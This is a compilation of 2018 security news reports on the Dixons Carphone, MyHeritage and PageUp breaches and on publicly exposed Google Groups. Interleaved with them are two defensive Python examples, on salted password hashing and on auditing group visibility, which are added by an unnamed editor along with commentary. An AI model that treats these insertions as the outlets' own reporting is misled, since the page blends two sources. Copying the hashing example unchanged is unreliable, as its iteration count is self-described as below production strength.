The breach notification concerns center around the Dixons Carphone statement. Some commenters praise the apparent speed and fullness of its notification to victims. Ilia Kolochenko, CEO and founder of web security company High-Tech Bridge, says, "With over a billion compromised records last year, I think this particular incident is of small importance. Many similar breaches occur every day and alas remain unnoticed. Unless we have evidence of malicious exploitation of the allegedly stolen data, no major detriment is imputable upon the victims. In light of these facts, Dixons Carphone's decision to disclose - is rather laudable, albeit one may question the timeline of the disclosure. Many other companies are much less courageous to tell the truth, as even in light of GDPR enforcement, the new law cannot monitor proper disclosure of inconspicuous data breaches."

Others, however, fear that the statement attempts to minimize actual harm over and above warning the victims about potential future harm. Dixons Carphone chief executive, Alex Baldock, said, "we have currently no evidence of fraud as a result of these incidents." The statement also implies that victims needn't worry about their card details, since by far the majority are chip and PIN cards, and no CVVs were included. It does not mention the potential for phishing and other social engineering scams targeted against actual or just potential Dixons Carphone breach victims.

Trevor Resche, threat intelligence officer at Trusted Knight, is forthright. "Today's breach of Dixons data will have far reaching consequences for some time. While Dixons has said that there is no evidence of fraud taking place, now the data is in the criminal sphere, it's unlikely to be long before it starts being shopped around amongst criminals, with ensuing phishing and brute-force attacks launched."

For the moment, we don't know enough about the breach. Dixons Carphone is now working with law enforcement (NCSC), with the financial regulator (FCA), the data protection regulator (ICO), and "leading cyber security experts." Victims will need to monitor their bank accounts closely and be suspicious of all incoming Dixons Carphone-related emails, while businesses in general and the cybersecurity industry in particular will be watching the reaction of the data protection regulator. If the ICO finds that Dixons Carphone was negligent in its protection of customer data, it could levy a significant fine.


Dixons Carphone data breach, 5.9 million payment cards exposed
13.6.18 securityaffairs Incindent

Retailer Dixons Carphone has disclosed a security breach that involved 5.9 million payment cards and 1.2 million personal data records.
Dixons Carphone discovered "unauthorised access" to certain data held by the company; it promptly launched an investigation and hired an external firm to shed light on the case.

The company immediately reported the hack to law enforcement, regulators at the Information Commissioner’s Office and the Financial Conduct Authority.

“As part of a review of our systems and data, we have determined that there has been unauthorised access to certain data held by the company.” reads the data breach notification published by the company.

“Our investigation is ongoing and currently indicates that there was an attempt to compromise 5.9 million cards in one of the processing systems of Currys PC World and Dixons Travel stores. However, 5.8m of these cards have chip and pin protection. The data accessed in respect of these cards contains neither pin codes, card verification values (CVV) nor any authentication data enabling cardholder identification or a purchase to be made.”

The retailer explained that it has no evidence to date of any abuse of the data as a result of the hack. The bad news for customers is that the compromised information included payment card data.

Dixons Travel confirmed that hackers could have accessed data of 5.9 million cards stored in one of the processing systems of Currys PC World and Dixons Travel stores. The company highlighted that 5.8 million of these cards have chip and PIN protection; for those cards, the data accessed contains neither PIN codes, card verification values (CVV) nor any authentication data enabling cardholder identification or a purchase to be made.

Roughly 105,000 non-EU issued payment cards that do not use chip and PIN protection have been compromised.

The firm notified the relevant card companies via its payment provider about all compromised cards.

“Separately, our investigation has also found that 1.2m records containing non-financial personal data, such as name, address or email address, have been accessed. We have no evidence that this information has left our systems or has resulted in any fraud at this stage. We are contacting those whose non-financial personal data was accessed to inform them, to apologise, and to give them advice on any protective steps they should take.” added the company.

This isn’t the first time the company has suffered a security breach: in 2015 another incident exposed the credit card details of 90,000 Dixons Carphone customers.

Affected customers are in any case potentially exposed to phishing attacks and need to remain vigilant.


MyHeritage Says Over 92 Million User Accounts Have Been Compromised
8.6.18 thehackernews Incindent

MyHeritage, the Israel-based DNA testing service designed to investigate family history, has disclosed that the company website was breached last year by unknown attackers, who stole login credentials of its more than 92 million customers.
The company learned about the breach on June 4, 18, after an unnamed security researcher discovered a database file named "myheritage" on a private server located outside of the company and shared it with the MyHeritage team.


After analyzing the file, the company found that the database, which included the email addresses and hashed passwords of nearly 92.3 million users, belonged to customers who had signed up for the MyHeritage website before October 27, 2017.
While the MyHeritage security team is still investigating the data breach to identify any potential exploitation of its systems, the company confirmed that no other data, such as credit card details, family trees or genetic data, was breached; that data is stored on separate systems.
"Credit card information is not stored on MyHeritage to begin with, but only on trusted third-party billing providers (e.g., BlueSnap, PayPal) utilized by MyHeritage," MyHeritage wrote in a blog post published today.
"Other types of sensitive data such as family trees and DNA data are stored by MyHeritage on segregated systems, separate from those that store the email addresses, and they include added layers of security. We have no reason to believe those systems have been compromised."
MyHeritage also confirmed that there was no evidence of account compromise.


The company also notes that it does not store its customer passwords in plaintext; instead, the affected website uses a hashing algorithm with a unique salt to protect users' passwords, making them more resilient to cracking.
Therefore, your stolen passwords are probably safe, but the company still advised all of its users to change their passwords and choose a strong, unique one, just to be on the safe side.
MyHeritage said it had hired an independent cybersecurity firm to conduct a forensic investigation of the data breach. The company also said it is adding a two-factor authentication feature as an option for users.


92 Million User Credentials Exposed in MyHeritage Data Breach
7.6.18 securityweek Incindent

[Updated] MyHeritage, a DNA and genealogy firm, announced Monday that the access credentials of 92 million users had been stolen. It only discovered the breach when a security researcher informed the company he had found a file named myheritage stored outside of MyHeritage.

The file contains, writes MyHeritage CISO Omer Deutsch in a statement, "the email addresses and hashed passwords of 92,283,889 users who had signed up to MyHeritage up to and including Oct 26, 2017 which is the date of the breach." He stresses that the passwords are stored as "a one-way hash of each password, in which the hash key differs for each customer" (possibly implying that each password is hashed with a unique salt).

Deutsch believes that only the credentials were stolen. "We have no reason to believe that any other MyHeritage systems were compromised." Furthermore, he adds, "we have not seen any activity indicating that any MyHeritage accounts had been compromised." Payment data, user DNA data and family trees have not been affected.

MyHeritage went public with commendable speed – on the same day it learnt of the breach. However, some aspects of the statement are concerning. For example, it immediately set up an incident response team to investigate the incident. Best practice would have such a team already established in anticipation of a breach.

The firm is expediting "work on the upcoming two-factor authentication feature that we will make available to all MyHeritage users soon." Best practice would have had MFA in place long ago. Furthermore, it will 'recommend' rather than require users to employ the MFA option. It also recommends users should change their passwords, when it should perhaps force a password reset on all users.

"It appears that MyHeritage hasn't taken the steps to automatically require users to change passwords, just that they recommend they do," comments Absolute Software's Global Security Strategist Richard Henderson. "That should be an immediate action for any breach of this type. We still don't know (and neither do they) how this information was stolen, or the motives for doing so... and the statement by MyHeritage that they believe no other data was taken, especially unique DNA information and genealogy information, is probably a little premature, until they can determine exactly what happened late last October."

The reassuring tone of the MyHeritage statement is also challenged by Anthony James, CMO of CipherCloud. "Don't believe for a second that a hashed password is safe," he says. "Hashed passwords are absolutely not safe if stolen – these hashed passwords are still highly vulnerable to a dictionary attack, where the attacker runs a hash function against the top 100,000 most popular passwords and computes the hash function against all of them. Then all they need do is compare these calculated values to the list stolen from MyHeritage. So, NO, a smart cyber-attacker could be working diligently, even now, to map the hashed values to real passwords and break the accounts."

The unknown quality of the hashing function could make the credential cracking more difficult, but not necessarily impossible. Furthermore, it may not be necessary if the user has had the same password with the same email address stolen in a different breach with a weak hash function. SecurityWeek has contacted MyHeritage asking for further details on the hashing process, and will update this report with any response.
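The dictionary attack James describes works because a table of unsalted, fast hashes can be matched against a single precomputed table, and that same precomputation carries over to any other breach of the same users, which is the credential-reuse risk raised above. The Python below is an added illustration of the defender-side counterpart, written for this page rather than taken from MyHeritage, PageUp (whose bcrypt-and-salt statement appears later on this page) or any vendor: a per-user random salt plus a slow key-derivation function, here PBKDF2-HMAC-SHA256 from the standard library standing in for bcrypt or Argon2, stored as a self-describing record so that records made with weaker parameters can be detected and re-hashed at the next successful login. The sample accounts and passwords are constructed.

```python
import hashlib
import hmac
import os
from typing import Callable, Dict, Optional

# PBKDF2-HMAC-SHA256 work factor. Kept modest so the example runs in well under a
# second; production systems should use a far higher count, or bcrypt/scrypt/Argon2.
ITERATIONS = 100_000
SCHEME = "pbkdf2_sha256"


def fast_unsalted_hash(password: str) -> str:
    """What a weak scheme stores: one unsalted SHA-256 of the password.
    Equal passwords give equal digests, so one precomputed table covers every user
    and every other site that stored the same password the same way."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = ITERATIONS) -> str:
    """Per-user random salt plus a slow KDF. The record is self-describing
    (scheme$iterations$salt_hex$digest_hex) so parameters can be raised later."""
    if salt is None:
        salt = os.urandom(16)  # 128-bit random salt, unique per record
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{SCHEME}${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute with the record's own salt and iteration count; compare in constant time."""
    scheme, iterations, salt_hex, digest_hex = record.split("$")
    if scheme != SCHEME:
        raise ValueError(f"unsupported scheme: {scheme}")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def needs_rehash(record: str) -> bool:
    """True when a record was made with weaker parameters than current policy.
    Call after a successful login and re-hash with the plaintext just verified."""
    scheme, iterations, _salt, _digest = record.split("$")
    return scheme != SCHEME or int(iterations) < ITERATIONS


# Constructed sample accounts (not real data); two users chose the same weak password.
SAMPLE_USERS: Dict[str, str] = {
    "alice@example.com": "Password123",
    "bob@example.com": "Password123",
    "carol@example.com": "correct horse battery staple",
}


def distinct_stored_values(users: Dict[str, str], hasher: Callable[[str], str]) -> int:
    """Number of distinct values a leaked credential table would contain.
    Unsalted: shared passwords collapse to one value. Salted: every record is unique,
    so nothing precomputed for one user (or one breach) applies to another."""
    return len({hasher(pw) for pw in users.values()})


if __name__ == "__main__":
    print("unsalted distinct values:", distinct_stored_values(SAMPLE_USERS, fast_unsalted_hash))
    print("salted distinct values:  ", distinct_stored_values(SAMPLE_USERS, hash_password))
    rec = hash_password("Password123")
    print("verify correct:", verify_password("Password123", rec))
    print("verify wrong:  ", verify_password("password123", rec))
    print("needs rehash:  ", needs_rehash(rec))
```

The self-describing record is what lets a site answer the question SecurityWeek put to MyHeritage ("what hashing process?") from its own data and raise the work factor over time without a forced reset; a forced reset, as MyHeritage later chose, is still the right response once the table is known to be in someone else's hands.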

Rick Moy, CMO at Acalvio, is concerned that MyHeritage did not itself detect the intrusion, "as demonstrated by the seven-month delay, and the fact they were alerted by a third party." The implication is that the firm does not have adequate detection capabilities – and if it failed to detect this, there may be other incidents with the other systems that have also gone undetected.

This possibility also concerns Rashmi Knowles, EMEA Field CTO at RSA Security. "If your password is stolen, it can be updated, but this isn't the case with genetic information," she warns. "You only have one genetic identity, so if this is stolen there are potentially much more serious consequences. But many people don't think about this when applying for such services. No matter how secure the organization, no one is completely risk-free, and if breached, genetic data could be sold on to other hackers without your consent, or the characteristic data it contains could be used to hijack your online accounts. There's even a possibility that hackers can amend or even delete genetic data in some cases, which could have serious implications for the victim and the level of healthcare or even health insurance they could access in the future."

There is potentially an additional side-story to this incident. MyHeritage reports, "We are taking steps to inform relevant authorities including as per GDPR." SecurityWeek has asked MyHeritage to expand on this. Who are the relevant GDPR authorities for MyHeritage?

The firm lists numerous contact phone numbers in various European countries, including the provision of "24/7 support" from the Irish phone. This suggests that the Irish regulator may be the relevant GDPR authority for MyHeritage. There is little doubt that MyHeritage is liable under GDPR, and it seems that it is reachable by the GDPR authorities via its European offices. The only question here is whether Europe will decide to make a high-profile example of MyHeritage early into the GDPR age.

But what about the researcher? Is he or she also liable under GDPR for unsanctioned storage of and access to European PII? It is a moot point. The UK's Information Commissioner's Office has told SecurityWeek that researchers are exempt from GDPR under the principle of 'legitimate interest'.

This is not the view of David Flint, senior partner at MacRoberts LLP. Asked if researchers should be concerned about GDPR, he told SecurityWeek, "The short answer is YES! Under the GDPR/DPA 18 the researcher couldn't be a Processor (as he is not acting on instructions of a Controller) therefore he must be a Controller."

So, as a controller, "If a researcher comes across that data he should advise all the Data Subjects that he has the data and what he intends to do with it, sending them a Privacy Notice. (article 14). Article 89 GDPR deals with an exemption for historical research which doesn't seem relevant here."

It is interesting times. MyHeritage users will need to wait to see if their DNA has or may be compromised, researchers will need to wait to see if GDPR may be enforced against them; and businesses around the world – including MyHeritage – will be waiting to see how forcefully GDPR will be enforced by the European Union.

Update

In a new blog posted Wednesday, MyHeritage has announced that it will be retiring all existing MyHeritage passwords. "To maximize the security of our users, we have started the process of expiring ALL user passwords on MyHeritage," writes CISO Omer Deutsch. "This process will take place over the next few days. It will include all 92.3 million affected user accounts plus all 4 million additional accounts that have signed up to MyHeritage after the breach date of October 26, 2017. As of now, we’ve already expired the passwords of more than half of the user accounts on MyHeritage. Users whose passwords were expired are forced to set a new password and will not be able to access their account and data on MyHeritage until they complete this."


HR Software Firm PageUp Suffers Data Breach
6.6.18 securityweek Incindent

PageUp, an Australian company that provides HR software, informed customers this week that it launched an investigation on May 23 after detecting suspicious activity on its IT infrastructure.

The firm’s analysis of the incident revealed on May 28 that hackers may have gained access to names, contact information, usernames, and password hashes. Documents, such as signed employment contracts and resumes, should be safe as they are stored on different servers.

“There is no evidence that there is still an active threat, and the jobs website can continue to be used. All client user and candidate passwords in our database are hashed using bcrypt and salted, however, out of an abundance of caution, we suggest users change their password,” said Karen Cariss, CEO and co-founder of PageUp.

While the company has only shared limited technical information regarding the incident, it did say that the attack involved a piece of malware. The breach has been investigated by both law enforcement and cybersecurity experts. Cybersecurity organizations and data regulators in Australia and the United Kingdom have been notified.

PageUp says it has 2.6 million active users across over 190 countries. Some of the company’s customers have notified job applicants and shut down their online recruitment pages following the incident.

Australia Post, which has been using PageUp since October 2016, highlighted that in the case of individuals whose applications were successful, bank details, tax file numbers and other sensitive information was also stored on PageUp servers. There is no evidence, however, that this data has been accessed by hackers, Australia Post said.

Wesfarmers-owned supermarket chain Coles has shut down its careers website and issued a statement saying it has suspended all connections between its systems and PageUp while an investigation is conducted. Other Wesfarmers retailers, including Kmart, Target and Officeworks, have also shut down their careers websites.

Australian telecoms giant Telstra has also suspended its online recruitment system due to the breach at PageUp. The company warned successful applicants that their date of birth, employment offer details, and pre-employment check outcomes were stored on PageUp systems.

The incident also impacts logistics and supply chain company Linfox and private health insurer Medibank, both of which have suspended their careers pages.

Several universities in the United States also use PageUp. However, at the time of writing, none of the U.S. universities listed on PageUp’s testimonials page have issued security alerts or suspended their online recruitment systems.


Thousands of Organizations Expose Sensitive Data via Google Groups
6.6.18 securityweek Incindent

Google has issued a warning to G Suite users after researchers discovered that thousands of organizations expose sensitive information through misconfigured Google Groups instances.

The Google Groups service allows users to create mailing lists, host internal discussions, and process support tickets. These types of communications can include highly sensitive information, which is why it’s important for companies to ensure that privacy and security settings are configured properly.

When a group is configured, its creator has to set sharing options for “Outside this domain - access to groups” to either “Private” or “Public on the Internet.” While the default option is “Private,” many organizations have set it to “Public on the Internet,” in many cases likely not realizing that anyone can access the group.
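A check of the kind Kenna ran, written as an added example for this page rather than Kenna's or Google's own tooling: it takes per-group settings records and flags archives readable by anyone on the Internet, then produces the hardened setting. The records are constructed, and the field and value names (whoCanViewGroup, ANYONE_CAN_VIEW and so on) are an assumption that they match Google's Groups Settings API; the page itself names only the UI labels "Private" and "Public on the Internet". The example goes one step beyond the page by also reporting domain-wide visibility for review, since support or HR archives are often too sensitive for every employee to read.

```python
from typing import Dict, List, Optional, Tuple

# whoCanViewGroup values. Assumption: these names match Google's Groups Settings API;
# the page only gives the UI labels "Private" and "Public on the Internet".
ANYONE_CAN_VIEW = "ANYONE_CAN_VIEW"            # "Public on the Internet"
ALL_IN_DOMAIN_CAN_VIEW = "ALL_IN_DOMAIN_CAN_VIEW"  # the "Private" default
ALL_MEMBERS_CAN_VIEW = "ALL_MEMBERS_CAN_VIEW"

# Constructed sample records (not from any real domain), shaped like the per-group
# settings one would fetch before running the check.
SAMPLE_GROUPS: List[Dict[str, str]] = [
    {"email": "support@example.com", "whoCanViewGroup": ANYONE_CAN_VIEW,
     "whoCanPostMessage": "ANYONE_CAN_POST"},
    {"email": "finance@example.com", "whoCanViewGroup": ANYONE_CAN_VIEW,
     "whoCanPostMessage": "ALL_MEMBERS_CAN_POST"},
    {"email": "eng@example.com", "whoCanViewGroup": ALL_IN_DOMAIN_CAN_VIEW,
     "whoCanPostMessage": "ALL_IN_DOMAIN_CAN_POST"},
    {"email": "board@example.com", "whoCanViewGroup": ALL_MEMBERS_CAN_VIEW,
     "whoCanPostMessage": "ALL_MEMBERS_CAN_POST"},
]


def classify(group: Dict[str, str]) -> Optional[str]:
    """Severity of one group's archive visibility, or None when members-only.
    PUBLIC is the misconfiguration discussed above; DOMAIN_WIDE is the default,
    reported for review only (this goes beyond the page, which covers the public case)."""
    view = group.get("whoCanViewGroup")
    if view == ANYONE_CAN_VIEW:
        return "PUBLIC"
    if view == ALL_IN_DOMAIN_CAN_VIEW:
        return "DOMAIN_WIDE"
    return None


def audit(groups: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Findings as (group address, severity), public groups listed first."""
    findings = []
    for g in groups:
        label = classify(g)
        if label is not None:
            findings.append((g["email"], label))
    # sorted() is stable, so input order is kept within each severity
    return sorted(findings, key=lambda f: 0 if f[1] == "PUBLIC" else 1)


def remediate(group: Dict[str, str]) -> Dict[str, str]:
    """Hardened copy of the settings: archive readable by group members only."""
    fixed = dict(group)
    fixed["whoCanViewGroup"] = ALL_MEMBERS_CAN_VIEW
    return fixed


if __name__ == "__main__":
    for address, severity in audit(SAMPLE_GROUPS):
        print(f"{severity:<11} {address}")
```

Run against real settings, the same loop would take the records returned for each group in the domain; the check is deliberately a pure function of the settings so it can be re-run on every change and the findings diffed.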

Data exposed through misconfigured Google Groups

Researchers at Kenna Security have conducted an analysis of roughly 2.5 million domains and identified more than 9,600 organizations that had allowed public access to their groups. After taking a closer look at a random sample of 171 groups, the company estimated that nearly 3,000 of the over 9,600 companies leaked some type of sensitive information.

The impacted organizations include Fortune 500 companies, universities, hospitals, media firms, financial institutions, and even government agencies.

The exposed information includes financial data, passwords, and documents containing confidential information.

“Given the sensitive nature of this information, possible implications include spear-phishing, account takeover, and a wide variety of case-specific fraud and abuse,” Kenna Security said in a blog post.

The company notified some of the organizations leaking highly sensitive data and pointed out that the “views” counter was at zero in the vast majority of cases, which indicates that no one had seen the information.

Kenna has also notified Google, but since this is not an actual vulnerability, the issue cannot be addressed with a patch. The tech giant did say, however, that it’s always reviewing its products to “help users make decisions that are appropriate for their organizations.”

Google has also published a post on its G Suite blog, providing advice on how users can configure their Google Groups settings to better protect their data.

This is not the first time researchers have warned about the risks associated with misconfigured Google Groups instances. Last year, cloud security firm RedLock warned that hundreds of organizations were likely exposing sensitive data through Google Groups. At the time, the company found names, email and home addresses, employee salary data, sales pipeline data, and customer passwords in the exposed groups.


MyHeritage data breach – 92.3 million user credentials exposed
6.6.18 securityaffairs Incindent

A security researcher discovered email addresses and hashed passwords of roughly 92.3 million Myheritage users stored on a private server outside the company.
The huge trove of data was contained in a single file; according to the experts, the information is authentic and comes from MyHeritage.

“Today, June 4, 18 at approximately 1pm EST, MyHeritage’s Chief Information Security Officer received a message from a security researcher that he had found a file named “myheritage” containing email addresses and hashed passwords, on a private server outside of MyHeritage.” reads the data breach notification published by the company.

“Our Information Security Team received the file from the security researcher, reviewed it, and confirmed that its contents originated from MyHeritage and included all the email addresses of users who signed up to MyHeritage up to October 26, 2017, and their hashed passwords.”

MyHeritage offers a service for the investigation of family history and the reconstruction of the family tree through DNA analysis.


The expert who made the disconcerting discovery reported it to the company on June 4, 18. The incident seems to have affected those users who signed up for the service on or before Oct. 26, 2017.

The expert found only usernames and hashed passwords; no other information was discovered on the server hosting the file.

The company pointed out that passwords were not stored in plain text but did not explain the hashing mechanism used to protect them.

MyHeritage handles billing information through third parties, while DNA data and other sensitive data are stored on segregated systems.

At the time of writing, the company had not observed any abuse of the compromised data.

“Since Oct 26, 2017 (the date of the breach) and the present we have not seen any activity indicating that any MyHeritage accounts had been compromised.” continues the notification.

“We believe the intrusion is limited to the user email addresses. We have no reason to believe that any other MyHeritage systems were compromised.”

The company set up an Information Security Incident Response Team to investigate the security breach and is going to hire a cybersecurity firm to conduct comprehensive forensic investigations.

The company announced that it is planning to introduce a two-factor authentication feature to provide further protection to its users.

“MyHeritage users who have questions or concerns about this incident can contact our security customer support team via email on privacy@myheritage.com or by phone via the toll-free number (USA) +1 888 672 2875, available 24/7.” concluded the company.

“For all registered users of MyHeritage, we recommend that for maximum safety, they change their password on MyHeritage.”